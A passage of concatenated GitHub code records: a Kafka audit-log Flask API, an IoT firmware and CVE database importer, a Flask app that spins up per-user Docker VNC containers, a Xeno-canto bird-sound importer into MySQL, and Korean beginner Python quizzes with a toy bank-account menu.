messages at the beginning of the message queue.\n    # To prevent the for loop from blocking, we set the timeout to\n    # 1000ms. There is a risk that this loop never stops if the\n    # index is large and messages are constantly being received!\n    consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n                                         consumer_timeout_ms=1000)\n    logger.info("Retrieving order at index %d" % index)\n    try:\n        event_counter = 0\n        for msg in consumer:\n            msg_str = msg.value.decode('utf-8')\n            msg = json.loads(msg_str)\n            # Find the event at the index you want and\n            # return code 200\n            # i.e., return event, 200\n            if msg["type"] == "order" and event_counter == index:\n                return msg, 200\n            elif msg["type"] == "order":\n                event_counter += 1\n    except:\n        logger.error("No more messages found")\n\n    logger.error("Could not find order at index %d" % index)\n    return { "message": "Not Found"}, 404\n\napp = connexion.FlaskApp(__name__, specification_dir='')\napp.add_api("ZCACIT3855-Inventory-API-1.0.0-swagger.yaml", base_path="/audit_log", strict_validation=True, validate_responses=True)\nif "TARGET_ENV" not in os.environ or os.environ["TARGET_ENV"] != "test": \n    CORS(app.app) \n    app.app.config['CORS_HEADERS'] = 'Content-Type'\n\nif __name__ == "__main__":\n    app.run(port=8200)\n","repo_name":"ZC729/acit3855docker","sub_path":"audit_log/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7099599921","text":"\nimport bdb\n\nfrom app.backend.models.firmware_models import *\n\n# CryptoKey\nfrom app.backend.models.user import User\n\n\n\ndef add_update_device_infor(id, manufacturer, model_name, firmware_version, is_discontinued,cve_list,device_type,firmware_info,latest_firmware_info,cve_id,cvss,name,version,sha2,release_date,download_url):\n    if id:\n        deviceinfor=DeviceInfo.query.filter_by(id=id).first()\n
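        # partial update: each field falls back to its stored value whenever the corresponding argument is falsy\n        deviceinfor.manufacturer=manufacturer if manufacturer else 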
deviceinfor.manufacturer\n        deviceinfor.model_name=model_name if model_name else deviceinfor.model_name\n        deviceinfor.firmware_version=firmware_version if firmware_version else deviceinfor.firmware_version\n        deviceinfor.is_discontinued=is_discontinued if is_discontinued else deviceinfor.is_discontinued\n        deviceinfor.cve_list=cve_list if cve_list else deviceinfor.cve_list\n        deviceinfor.device_type=device_type if device_type else deviceinfor.device_type\n        deviceinfor.firmware_info=firmware_info if firmware_info else deviceinfor.firmware_info\n        deviceinfor.latest_firmware_info=latest_firmware_info if latest_firmware_info else deviceinfor.latest_firmware_info\n\n        vulnerability=Vulnerability.query.filter_by(id=id).first()\n        vulnerability.cve_id=cve_id if cve_id else vulnerability.cve_id\n        vulnerability.cvss=int(cvss) if cvss else vulnerability.cvss\n\n        firminfor=FirmwareInfo.query.filter_by(id=id).first()\n        firminfor.name=name if name else firminfor.name\n        firminfor.version=version if version else firminfor.version\n        firminfor.sha2=sha2 if sha2 else firminfor.sha2\n        firminfor.release_date=release_date if release_date else firminfor.release_date\n        firminfor.download_url=download_url if download_url else firminfor.download_url\n\n        db.session.commit()\n    else:\n        data = dict(\n            manufacturer=str(manufacturer),\n            model_name=str(model_name),\n            firmware_version=str(firmware_version),\n            is_discontinued=str(is_discontinued),\n            cve_list=str(cve_list),\n            device_type=str(device_type),\n            firmware_info=str(firmware_info),\n            latest_firmware_info=latest_firmware_info\n        )\n        data0=dict(\n            cve_id=str(cve_id),\n            cvss=cvss\n        )\n        data1=dict(\n            name=str(name),\n            version=str(version),\n            sha2=str(sha2),\n            release_date=str(release_date),\n            download_url=str(download_url)\n        )\n        df = DeviceInfo(**data)\n        df0=Vulnerability(**data0)\n        df1=FirmwareInfo(**data1)\n\n        db.session.add(df)\n        db.session.add(df0)\n        db.session.add(df1)\n        db.session.commit()\n\n\n\ndef add_update_device_features(id, snmp_sysdescr, snmp_sysoid , ftp_banner, telnet_banner,hostname,http_response,https_response,upnp_response,nic_mac):\n    if id:\n        devicefeatures=DeviceFeatures.query.filter_by(id=id).first()\n        devicefeatures.snmp_sysdescr=snmp_sysdescr if snmp_sysdescr else devicefeatures.snmp_sysdescr\n        devicefeatures.snmp_sysoid=snmp_sysoid if snmp_sysoid else devicefeatures.snmp_sysoid\n        devicefeatures.ftp_banner=ftp_banner if ftp_banner else devicefeatures.ftp_banner\n        devicefeatures.telnet_banner=telnet_banner if telnet_banner else devicefeatures.telnet_banner\n        devicefeatures.hostname=hostname if hostname else devicefeatures.hostname\n        devicefeatures.http_response=http_response if http_response else devicefeatures.http_response\n        devicefeatures.https_response=https_response if https_response else devicefeatures.https_response\n        devicefeatures.upnp_response=upnp_response if upnp_response else devicefeatures.upnp_response\n        devicefeatures.nic_mac=nic_mac if nic_mac else devicefeatures.nic_mac\n        db.session.commit()\n    else:\n        current = DeviceFeatures.query.filter_by(snmp_sysdescr=snmp_sysdescr).first()\n        if current:\n            return None\n        data = dict(\n            snmp_sysdescr=str(snmp_sysdescr),\n            snmp_sysoid=str(snmp_sysoid),\n            ftp_banner=str(ftp_banner),\n            telnet_banner=str(telnet_banner),\n            hostname=str(hostname),\n            http_response=str(http_response),\n            https_response=str(https_response),\n            upnp_response=str(upnp_response),\n            nic_mac=str(nic_mac)\n        )\n        df = DeviceFeatures(**data)\n\n        db.session.add(df)\n        db.session.commit()\n\n\ndef use_report1(listx):\n
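    # listx appears to be a list of single-key dicts shaped like [{ip: {...scan report fields...}}, ...]\n    for index in 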
range(len(listx)):\n        ip = list(listx[index].keys())[0]\n        os = listx[index][ip].get("os", "null")\n        vendor = listx[index][ip].get("vendor", "null")\n        model_name = listx[index][ip].get('model_name', '')\n        firmware_version = listx[index][ip].get('firmware_version', '')\n        is_discontinued = listx[index][ip].get('is_discontinued', '')\n        cve_list = list(listx[index][ip].keys())[5]\n        cve_id = []\n        cvss = []\n        for i in range(len(listx[index][ip][cve_list])):\n            cve_id.append(listx[index][ip][cve_list][i].get('cve_id', ''))\n            cvss.append(listx[index][ip][cve_list][i].get('cvss', ''))\n        device_type = listx[index][ip].get('device_type', '')\n\n        firmware_infor = list(listx[index][ip].keys())[7]\n        firmware_infor_name = listx[index][ip][firmware_infor].get('name', '')\n        firmware_infor_version = listx[index][ip][firmware_infor].get('version', '')\n        firmware_infor_sha2 = listx[index][ip][firmware_infor].get('sha2', '')\n        str_cve_id = ''\n        str_cvss = ''\n        for i in range(len(cve_id)):\n            str_cvss = str_cvss + cvss[i] + ','\n            str_cve_id = str_cve_id + cve_id[i] + ','\n\n        tcp = list(listx[index][ip].keys())[8]\n        udp = list(listx[index][ip].keys())[9]\n\n        tcp_port = []\n        tcp_service = []\n        udp_port = []\n        udp_service = []\n        snmp_sysdescr_list = []\n\n        for i in range(len(listx[index][ip][tcp])):\n            tcp_port.append(listx[index][ip][tcp][i].get('port', ''))\n            tcp_service.append(listx[index][ip][tcp][i].get('service', ''))\n            snmp_sysdescr_list.append(listx[index][ip][tcp][i].get('snmp_sysdescr', ''))\n        for i in range(len(listx[index][ip][udp])):\n            udp_port.append(listx[index][ip][udp][i].get('port', ''))\n            udp_service.append(listx[index][ip][udp][i].get('service', ''))\n            snmp_sysdescr_list.append(listx[index][ip][udp][i].get('snmp-sysdescr', ''))\n        snmp_sysdescr = ''\n        for i in range(len(snmp_sysdescr_list)):\n            snmp_sysdescr = snmp_sysdescr + snmp_sysdescr_list[i]\n\n        snmp_sysdescr=listx[index][ip].get('snmp_sysdescr','')\n        snmp_sysoid=listx[index][ip].get('snmp_sysoid','')\n        ftp_banner=listx[index][ip].get('ftp_banner','')\n        telnet_banner=listx[index][ip].get('telnet_banner','')\n        hostname=listx[index][ip].get('hostname','')\n        http_response=listx[index][ip].get('http_response','')\n        https_response=listx[index][ip].get('https_response','')\n        upnp_response=listx[index][ip].get('upnp_response','')\n        nic_mac=listx[index][ip].get('nic_mac','')\n\n        add_update_device_infor(None, vendor, model_name, firmware_version, is_discontinued, '', device_type, '', 0,\n                                str_cve_id, str_cvss, firmware_infor_name, firmware_infor_version, firmware_infor_sha2,\n                                '', '')\n        # add_update_device_infor(None,vendor,model_name,firmware_version,is_discontinued,None,device_type,None,None,str_cve_id,str_cvss,firmware_infor_name,firmware_infor_version,firmware_infor_sha2,None,None)\n        add_update_device_features(None,snmp_sysdescr,snmp_sysoid,ftp_banner,telnet_banner,hostname,http_response,https_response,upnp_response,nic_mac)\n","repo_name":"chency87/iot-vas","sub_path":"app/backend/controller/Task/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":7857,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"71591263848","text":"from flask import Blueprint, render_template, session, redirect, request, jsonify\nfrom flask_login import login_required, current_user\n
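# 'host', used by getDocker() below, is presumably supplied by this package-level wildcard import\nfrom . 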
import *\nimport random\nimport string\nimport subprocess\nimport docker\nfrom docker import *\n\nmain = Blueprint('main', __name__)\n\nnetworkCount = 0\ndocker_limit = 100\nportlist = []\nnamelist = []\nnameurl = {}\ndockerlist = {}\nclient = docker.from_env()\nnumber_of_subnets = 0\n\n\n@main.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n\n\n# Using this to generate the names/passwords for the docer containers\ndef randomStringDigits(stringLength=10):\n \"\"\"Generate a random string of letters and digits \"\"\"\n lettersAndDigits = string.ascii_letters + string.digits\n return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))\n\n\ndef spaceForDocker(count):\n return bool(int(subprocess.check_output(\"docker container ls --all | wc -l\", shell=True).decode(\"utf-8\")) > count)\n\n\ndef generatePort():\n global portlist\n port = random.randint(30000, 50000)\n while port in portlist:\n port = random.randint(30000, 50000)\n portlist.append(port)\n return port\n\n\ndef generateName():\n global namelist\n container = randomStringDigits(10)\n while container in namelist:\n container = randomStringDigits(10)\n namelist.append(container)\n return container\n\n\n# This function creates a new docker network with a unique subnet\ndef newNetwork(subnet):\n global client\n # class IPAMPool(subnet=None, iprange=None, gateway=None, aux_addresses=None)\n # Create an IPAM pool config dictionary to be added to the pool_configs parameter of IPAMConfig.\n ipam_pool = docker.types.IPAMPool(\n subnet=subnet\n )\n\n # class IPAMConfig(driver='default', pool_configs=None, options=None)\n # Create an IPAM (IP Address Management) config dictionary to be used with create_network().\n ipam_config = docker.types.IPAMConfig(\n pool_configs=[ipam_pool]\n )\n\n # create(name, *args, **kwargs)\n # Create a network. Similar to the docker network create.\n try:\n client.networks.create(\n str(session['container']),\n ipam=ipam_config\n )\n except RuntimeError as e:\n print(\"WARNING!!! Network already exists.\")\n print(e)\n\n\ndef newContainer(imageName):\n global networkCount\n global dockerlist\n global client\n session['port'] = generatePort()\n session['container'] = generateName()\n session['password'] = randomStringDigits(20)\n # Adding this to the master list\n dockerlist[session['container']] = session['port']\n newNetwork(('172.11.' + str(networkCount % 256) + '.0/24'))\n client.containers.run(imageName,\n tty=True,\n detach=True,\n network=str(session['container']),\n name=str(session['container']),\n user='0',\n ports={'6901/tcp': str(session['port'])},\n environment=[\"VNC_PW=\" + str(session['password']),\n \"VNC_RESOLUTION=800x600\"])\n networkCount += 1\n\ndef check():\n email = current_user.email\n if email in namelist:\n return True\n else:\n return False\n\n\ndef getDocker(imageName):\n\n global namelist\n global nameurl\n print(nameurl)\n if nameurl.get(str(current_user.email))is not None:\n return nameurl[str(current_user.email)]\n else:\n newContainer(imageName)\n url = ('http://' + str(host) + ':' + str(session['port']) + '/?password=' + str(session['password']))\n print(url)\n nameurl[str(current_user.email)] = url\n return nameurl[str(current_user.email)]\n\n\n@main.route('/router')\ndef router():\n global portlist\n global namelist\n global dockerlist\n global docker_limit\n print(dockerlist)\n # Sorry all out of containers html page... 
Create one!!\n if spaceForDocker(docker_limit):\n return render_template('error.html')\n url = getDocker('atr2600/zenmap-vnc-ubuntu')\n return redirect(url)\n\n\n@main.route('/')\n@login_required\ndef index():\n global portlist\n global namelist\n global dockerlist\n global docker_limit\n print(dockerlist)\n # Sorry all out of containers html page... Create one!!\n if spaceForDocker(docker_limit):\n return render_template('error.html')\n url = getDocker('atr2600/zenmap-vnc-ubuntu')\n return redirect(url)\n\n\n# Yes this should be limited to only the admin role..\n# I do not have enough time to implement this right now.\n@main.route('/admin', methods=['GET', 'POST'])\ndef admin():\n global number_of_subnets\n\n # Here we are going to get some settings from the admin.\n\n if request.method == 'POST':\n number_of_subnets = request.form.get('number_of_subnets')\n return redirect('/admin')\n\n\n if request.method == 'GET':\n return render_template(\"admin.html\")\n\n\n\n####\n## This function does:\n## 1. Removes the port and name from the portlist and namelist\n## 2. Removes the container from the master list.\n## 3. Clears the session\n## 4. Sends kill docker command to the system.\n####\ndef destroy():\n global portlist\n global namelist\n global dockerlist\n global client\n # killing docker container\n client.containers.get(session['container']).remove(force=True)\n client.networks.prune(filters=None)\n # Cleaning up the port numbers and container name\n portlist.remove(dockerlist[session['container']])\n namelist.remove(session['container'])\n del dockerlist[session['container']]\n print('Killed container: ' + session['container'])\n session.clear()\n","repo_name":"brandonrc/DDLS","sub_path":"project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43163501871","text":"#!/usr/bin/env python3\n\nimport os\nimport glob\nimport shutil\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory ' + directory)\n return 0\n\ndef removeTypeFile(TypeFile,directory):\n\tfor zippath in glob.iglob(os.path.join(directory, \"*.\"+TypeFile)):\n\t\tos.remove(zippath)\n\treturn 0\n\ndef removeFolder(directory):\n\t# Delete all contents of a directory using shutil.rmtree() and handle exceptions\n\ttry:\n\t shutil.rmtree(directory)\n\texcept:\n\t print('Error while deleting directory')","repo_name":"AgustinPardo/demultiplex","sub_path":"file_manage.py","file_name":"file_manage.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18975344775","text":"from os import name\nfrom typing import NamedTuple, List\nfrom datetime import timedelta\nfrom mysql.connector.cursor import MySQLCursor\nfrom urllib.request import urlopen\nfrom xmltodict import parse\nfrom tools.logging import debug, info, error\nimport csv\nimport argparse\nfrom math import ceil\nfrom pathlib import Path\nfrom tools.configuration import parse_config\nfrom tools.file_handling.audio import read_parameters_from_audio_file\nfrom datetime import date, datetime\nfrom tools.db import sanitize_name, sanitize_altitude\nfrom tools.db.table_types import (\n XenoCantoRow,\n)\n\nfrom tools.file_handling.collect import (\n rename_and_copy_to,\n)\n\nfrom tools.db import (\n connectToDB,\n get_entry_id_or_create_it,\n 
get_id_of_entry_in_table,\n    get_synonyms_dict,\n)\n\nCONFIG_FILE_PATH = Path("config/defaultConfig.cfg")\nCSV_FILEPATH = Path("birdsounds.csv")\nFILES_DIRECTORY_PATH = Path(\n    "/mnt/z/AG/TSA/Mario/_Backups/XenoCantoDisk/sounds/"\n)\n\n\ndef import_xeno_canto(\n    files=FILES_DIRECTORY_PATH, config_path=CONFIG_FILE_PATH, csv_path=CSV_FILEPATH\n):\n    config = parse_config(config_path)\n    species_set = set()\n    a = config.record_information\n\n    def get_species_id(latin_name: str, english_name: str) -> int:\n        species_id = get_id_of_entry_in_table(\n            db_cursor, "species", [("latin_name", latin_name)]\n        )\n        if species_id is None:\n            species_id = get_id_of_entry_in_table(\n                db_cursor, "species", [("english_name", english_name)]\n            )\n        return species_id\n\n    with open(csv_path, newline="") as csvfile:\n        csv_reader = csv.reader(csvfile, delimiter=",", quotechar='"')\n        next(csv_reader)\n        missed_imports = []\n        with connectToDB(config.database) as db_connection:\n            with db_connection.cursor() as db_cursor:\n                db_cursor: MySQLCursor\n\n                collection_entry = [("name", "xeno-canto"), ("remarks", None)]\n                collection_id = get_entry_id_or_create_it(\n                    db_cursor, "collection", collection_entry, collection_entry\n                )\n                counter = 0\n                for row in csv_reader:\n                    counter = counter + 1\n                    if counter % 1000 == 0:\n                        db_connection.commit()\n\n                    xeno = XenoCantoRow(*row)\n                    xeno: XenoCantoRow\n                    species_set.add(\n                        ("{} {}".format(xeno.genus, xeno.species), xeno.eng_name)\n                    )\n                    synonyms_dict = get_synonyms_dict(db_cursor, "tsa_to_ioc10_1")\n                    latin_name = "{} {}".format(xeno.genus, xeno.species)\n                    species_id = get_species_id(latin_name, xeno.eng_name)\n                    if species_id is None:\n                        missed_imports.append(row)\n                        error(\n                            "Could not identify species {}, {} ".format(\n                                latin_name, xeno.eng_name\n                            )\n                        )\n                        continue\n                    # TODO: get File information\n                    file_path = files / Path(xeno.dir) / Path(xeno.path)\n                    if file_path.exists() is False:\n                        error("File does not exist {}".format(file_path.as_posix()))\n                        continue\n                    audio_file_parameters = None\n                    try:\n                        audio_file_parameters = read_parameters_from_audio_file(\n                            file_path\n                        )\n                    except:\n                        error(\n                            "Could not read audio Parameters from {}".format(file_path)\n                        )\n                        continue\n                    person_entry = [("name", sanitize_name(xeno.recordist, 128))]\n                    person_id = get_entry_id_or_create_it(\n                        db_cursor, "person", person_entry, person_entry\n                    )\n\n                    location_entry = [\n                        ("name", sanitize_name(xeno.location, 256)),\n                        ("description", None),\n                        ("habitat", None),\n                        (\n                            "lat",\n                            None\n                            if xeno.latitude == "?" or xeno.latitude == "NULL"\n                            else xeno.latitude,\n                        ),\n                        (\n                            "lng",\n                            None\n                            if xeno.longitude == "?" or xeno.longitude == "NULL"\n                            else xeno.longitude,\n                        ),\n                        (\n                            "altitude",\n                            sanitize_altitude(xeno.elevation),\n                        ),\n                        ("remarks", None),\n                    ]\n                    # print(location_entry)\n                    location_id = get_entry_id_or_create_it(\n                        db_cursor,\n                        "location",\n                        [\n                            ("name", location_entry[0][1]),\n                            ("description", None),\n                            ("habitat", None),\n                            ("remarks", None),\n                        ],\n                        location_entry,\n                    )\n                    db_connection.commit()\n                    equipment_id = None\n                    # print(xeno.time)\n                    # note: the original test `xeno.time == "?" or "?:?"` was always true\n                    # because the bare string "?:?" is truthy, so record_start was always None\n                    record_start = (\n                        None\n                        if xeno.time in ("?", "?:?")\n                        else datetime.strptime(xeno.time, "%H:%M")\n                    )\n                    # print(xeno.date)\n                    dateParts = xeno.date.split("-")\n                    dateParts[1] = "01" if dateParts[1] == "00" else dateParts[1]\n                    dateParts[2] = "01" if dateParts[2] == "00" else dateParts[2]\n                    target_record_file_path = "{}/{}/{}".format(\n                        audio_file_parameters.md5sum[0],\n                        audio_file_parameters.md5sum[1],\n
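                        # md5-prefix sharding: the first three hex characters of the checksum choose three nested directories\n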
audio_file_parameters.md5sum[2],\n )\n record_entry = [\n (\"date\", \"-\".join(dateParts)),\n (\n \"time\",\n record_start\n if record_start is None\n else record_start.time(),\n ),\n # (\n # \"end\",\n # record_start\n # if record_start is None\n # else (\n # record_start\n # + timedelta(\n # seconds=ceil(audio_file_parameters.duration)\n # )\n # ).time(),\n # ),\n (\"duration\", audio_file_parameters.duration),\n (\"sample_rate\", audio_file_parameters.sample_rate),\n (\"bit_depth\", audio_file_parameters.bit_depth),\n (\"bit_rate\", audio_file_parameters.bit_rate),\n (\"channels\", audio_file_parameters.channels),\n (\"mime_type\", audio_file_parameters.mime_type),\n (\n \"original_filename\",\n audio_file_parameters.original_filename,\n ),\n (\"file_path\", target_record_file_path),\n (\"filename\", audio_file_parameters.filename),\n (\"md5sum\", audio_file_parameters.md5sum),\n (\"license\", xeno.license),\n (\"recordist_id\", person_id),\n (\"equipment_id\", None),\n (\"location_id\", location_id),\n (\"collection_id\", collection_id),\n ]\n\n (record_id, created) = get_entry_id_or_create_it(\n db_cursor,\n \"record\",\n [\n (\"md5sum\", audio_file_parameters.md5sum),\n ],\n data=record_entry,\n info=True,\n )\n if created:\n # create xenocanto link\n xeno_canto_link_data = [\n (\"record_id\", record_id),\n (\"collection_id\", xeno.snd_nr),\n ]\n get_entry_id_or_create_it(\n db_cursor,\n \"record_xeno_canto_link\",\n xeno_canto_link_data,\n xeno_canto_link_data,\n )\n # move file to destination\n targetDirectory = (\n config.database.get_originals_files_path().joinpath(\n target_record_file_path\n )\n )\n targetDirectory.mkdir(parents=True, exist_ok=True)\n rename_and_copy_to(\n file_path,\n targetDirectory,\n audio_file_parameters.filename,\n )\n # create foreground annoation\n forground_annoation = [\n (\"record_id\", record_id),\n (\"species_id\", species_id),\n (\"background\", False),\n (\"individual_id\", None),\n (\"group_id\", None),\n (\"vocalization_type\", xeno.songtype),\n (\"quality_tag\", None),\n (\"start_time\", 0),\n (\"end_time\", audio_file_parameters.duration),\n (\"start_frequency\", None),\n (\"end_frequency\", None),\n (\"channel_ix\", None),\n (\"annotator_id\", person_id),\n ]\n # print(forground_annoation)\n get_entry_id_or_create_it(\n db_cursor,\n \"annotation_of_species\",\n forground_annoation,\n forground_annoation,\n )\n\n background_species = xeno.background.split(\",\")\n for species in background_species:\n back_species_id = get_species_id(latin_name, xeno.eng_name)\n if back_species_id is None:\n missed_imports.append(row)\n error(\n \"Could not identify species{}, {} \".format(\n latin_name, xeno.eng_name\n )\n )\n continue\n background_annoation = [\n (\"record_id\", record_id),\n (\"species_id\", species_id),\n (\"background\", True),\n (\"individual_id\", None),\n (\"group_id\", None),\n (\"vocalization_type\", None),\n (\"quality_tag\", None),\n (\"start_time\", 0),\n (\"end_time\", audio_file_parameters.duration),\n (\"start_frequency\", None),\n (\"end_frequency\", None),\n (\"channel_ix\", None),\n (\"annotator_id\", person_id),\n ]\n get_entry_id_or_create_it(\n db_cursor,\n \"annotation_of_species\",\n background_annoation,\n background_annoation,\n )\n db_connection.commit()\n\n\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\n \"--files\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n help=\"target folder\",\n default=FILES_DIRECTORY_PATH,\n)\n\nparser.add_argument(\n \"--csv\",\n metavar=\"path\",\n 
type=Path,\n    nargs="?",\n    help="csv file with all entries",\n    default=CSV_FILEPATH,\n)\nparser.add_argument(\n    "--config",\n    metavar="path",\n    type=Path,\n    nargs="?",\n    default=CONFIG_FILE_PATH,\n    help="config file with database credentials",\n)\n\nargs = parser.parse_args()\nif __name__ == "__main__":\n    import_xeno_canto(files=args.files, config_path=args.config, csv_path=args.csv)","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_xeno_canto.py","file_name":"import_xeno_canto.py","file_ext":"py","file_size_in_byte":13099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30960074815","text":"from hello import Member\nfrom hello.domains import my100, myRandom, memberlist\n\n\nclass Quiz00:\n    def quiz00calculator(self) -> None:\n        a = my100()\n        b = my100()\n        op = ['+', '-', '*', '/', '%']\n        opcode = op[myRandom(0, 4)]\n        s = f'{a} {opcode} {b} = '\n        if opcode == '+':\n            s += f'{self.add(a, b)}'\n        elif opcode == '-':\n            s += f'{self.sub(a, b)}'\n        elif opcode == '*':\n            s += f'{self.mul(a, b)}'\n        elif opcode == '/':\n            s += f'{self.div(a, b):.2f}'\n        else:\n            s += f'{self.mod(a, b)}'\n        print(s)\n        return None\n\n    @staticmethod\n    def add(a, b) -> int:\n        return a + b\n\n    @staticmethod\n    def sub(a, b) -> int:\n        return a - b\n\n    @staticmethod\n    def mul(a, b) -> int:\n        return a * b\n\n    @staticmethod\n    def div(a, b) -> float:\n        return a / b\n\n    @staticmethod\n    def mod(a, b) -> int:\n        return a % b\n\n    @staticmethod\n    def quiz01bmi():\n        this = Member()\n        this.name = Quiz00.quiz06member_choice()\n        this.height = myRandom(160, 190)\n        this.weight = myRandom(50, 100)\n        bmi = this.weight / (this.height * this.height) * 10000\n        s = f'{this.name}님의 비만도 결과 : '\n        if bmi >= 35:\n            s += '고도 비만'\n        elif bmi >= 30:\n            s += '중(重)도 비만 (2단계 비만)'\n        elif bmi >= 25:\n            s += '경도 비만 (1단계 비만)'\n        elif bmi >= 23:\n            s += '과체중'\n        elif bmi >= 18.5:\n            s += '정상'\n        else:\n            s += '저체중'\n        print(s)\n\n    @staticmethod\n    def quiz02dice():\n        print(myRandom(1, 6))\n\n    @staticmethod\n    def quiz03rps():\n        u = myRandom(1, 3)\n        c = myRandom(1, 3)\n        arr = ['가위', '바위', '보', 'Draw', 'Win', 'Lose']\n        i = 3\n        if abs(u - c) == 1:\n            i = 4 if u > c else 5\n        elif abs(u - c) == 2:\n            i = 5 if u > c else 4\n        print(f'user : {arr[u - 1]}, com : {arr[c - 1]} \\n결과 : {arr[i]}')\n\n    @staticmethod\n    def quiz04leap():\n        year = myRandom(1960, 2022)\n        print(f'{year}년은 윤년입니다.' 
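# Gregorian rule: a year is leap when divisible by 4 and not by 100, or when divisible by 400\n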
if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else f'{year}년은 평년입니다.')\n\n    def quiz05grade(self):\n        kor = myRandom(0, 100)\n        eng = myRandom(0, 100)\n        math = myRandom(0, 100)\n        hap = self.hap(kor, eng, math)\n        avg = self.avg(hap)\n        grade = self.get_grade(avg)\n        pass_chk = self.pass_chk(avg)\n        print(f'국어 점수 : {kor}\\n영어 점수 : {eng}\\n수학 점수 : {math}\\n합계 : {hap}\\n평균 : {avg:.2f}\\n학점 : {grade}\\n합격 여부 : {pass_chk}')\n\n    @staticmethod\n    def hap(kor, eng, math):\n        return kor + eng + math\n\n    @staticmethod\n    def avg(hap):\n        return hap / 3.0\n\n    @staticmethod\n    def get_grade(avg):\n        if avg >= 90:\n            return 'A'\n        elif avg >= 80:\n            return 'B'\n        elif avg >= 70:\n            return 'C'\n        elif avg >= 60:\n            return 'D'\n        else:\n            return 'F'\n\n    @staticmethod\n    def pass_chk(avg): # pass if the average is 60 or higher\n        return '합격' if avg >= 60 else '불합격'\n\n    @staticmethod\n    def quiz06member_choice():\n        return memberlist()[myRandom(0, 23)]\n\n    @staticmethod\n    def quiz07lotto():\n        answer = []\n        user = []\n        count = 0\n        while 1:\n            anum = myRandom(1, 45)\n            if anum not in answer:\n                answer.append(anum)\n            if len(answer) == 6:\n                break\n        while 1:\n            unum = myRandom(1, 45)\n            if unum not in user:\n                user.append(unum)\n            if len(user) == 6:\n                break\n        for i in range(6):\n            if user[i] in answer:\n                count += 1\n        s = f'이번주 로또 당첨 번호 : {answer}\\n사용자 번호 : {user}\\n'\n        if count == 6:\n            s += '1등입니다.'\n        elif count == 5:\n            s += '2등입니다.'\n        elif count == 4:\n            s += '3등입니다.'\n        else:\n            s += '낙첨되었습니다.'\n        print(s)\n\n    @staticmethod\n    def quiz08bank(): # only name, deposit and withdrawal are implemented\n        Account.main()\n\n    @staticmethod\n    def quiz09gugudan(): # side-by-side times table: prints the 2-5 and 6-9 columns together\n        s = ''\n        for k in range(2, 7, 4):\n            for i in range(1, 10):\n                for j in range(k, k + 4):\n                    s += f'{j} * {i} = {i * j} \\t'\n                s += '\\n'\n            s += '\\n'\n        print(s)\n\n'''\nThe class below solves problem 08.\n[Requirements (RFP)]\nThe bank name is Bit Bank (비트은행).\nAn account is created from a depositor name (name), an account number (account_number) and an amount (money).\nThe account number is generated randomly in a 3-digit - 2-digit - 6-digit format.\nFor example, 123-12-123456.\nThe deposited amount is random between 100 and 999 (implicitly in units of 10,000 won).\n'''\n\n\nclass Account(object):\n    def __init__(self, name, account_number, money):\n        self.BANK_NAME = '비트은행'\n        self.name = Quiz00.quiz06member_choice() if name is None else name\n        self.account_number = self.create_account_number() if account_number is None else account_number\n        self.money = myRandom(100, 1000) if money is None else money\n\n    def to_string(self):\n        return f'은행 : {self.BANK_NAME}, ' \\\n               f'입금자 : {self.name}, ' \\\n               f'계좌번호 : {self.account_number}, ' \\\n               f'금액 : {self.money} 만원'\n\n    @staticmethod\n    def create_account_number():\n        return ''.join('-' if i == 3 or i == 6 else str(myRandom(0, 9)) for i in range(13))\n\n    @staticmethod\n    def deposit(ls, account_number, deposit):\n        a = Account.find_account(ls, account_number)\n        if a is not None:\n            print(f'계좌번호 : {a.account_number}')\n            print(f'입금액 : {deposit} 만원')\n            a.money += deposit\n            return f'잔고 : {a.money} 만원'\n        else:\n            return '계좌번호를 다시 확인해주세요.'\n\n    @staticmethod\n    def withdraw(ls, account_number, withdraw):\n        a = Account.find_account(ls, account_number)\n        if a is not None:\n            if a.money >= withdraw:\n                a.money -= withdraw\n            else:\n                print('잔고가 부족합니다.')\n            return f'잔고 : {a.money} 만원'\n        else:\n            return '계좌번호를 다시 확인해주세요.'\n\n    @staticmethod\n    def del_account(ls, account_number):\n        for i, j in enumerate(ls):\n            if j.account_number == account_number:\n                del ls[i]\n\n    @staticmethod\n    def find_account(ls, account_number):\n        # return ''.join([j.to_string() if j.account_number == account_number else '' for i, j in enumerate(ls)])\n        for i, j in enumerate(ls):\n            if j.account_number == account_number:\n                return j\n\n    @staticmethod\n    def main():\n        ls = []\n        while 1:\n            menu = input('0. 종료 1. 계좌개설 2. 계좌목록 3. 입금 4. 출금 5. 계좌해지 6. 계좌조회\\n')\n            if menu == '0':\n                break\n            elif menu == '1':\n                acc = Account(None, None, None)\n                print(f'{acc.to_string()} ... 개설되었습니다.')\n                ls.append(acc)\n            elif menu == '2':\n                a = '\\n'.join(i.to_string() for i in ls)\n                print(a)\n            elif menu == '3':\n                print(Account.deposit(ls, input('입금할 계좌번호 : '), int(input('입금액 : '))))\n            elif menu == '4':\n                print(Account.withdraw(ls, input('출금할 계좌번호 : '), int(input('출금액 : '))))\n            elif menu == '5':\n                Account.del_account(ls, input('탈퇴할 계좌번호 : '))\n            elif menu == '6':\n                a = Account.find_account(ls, input('조회할 계좌번호 : '))\n                if a is not None:\n                    print(a.to_string())\n                else:\n                    print('찾으시는 계좌가 없습니다.')\n            else:\n                print('Wrong Number.. 
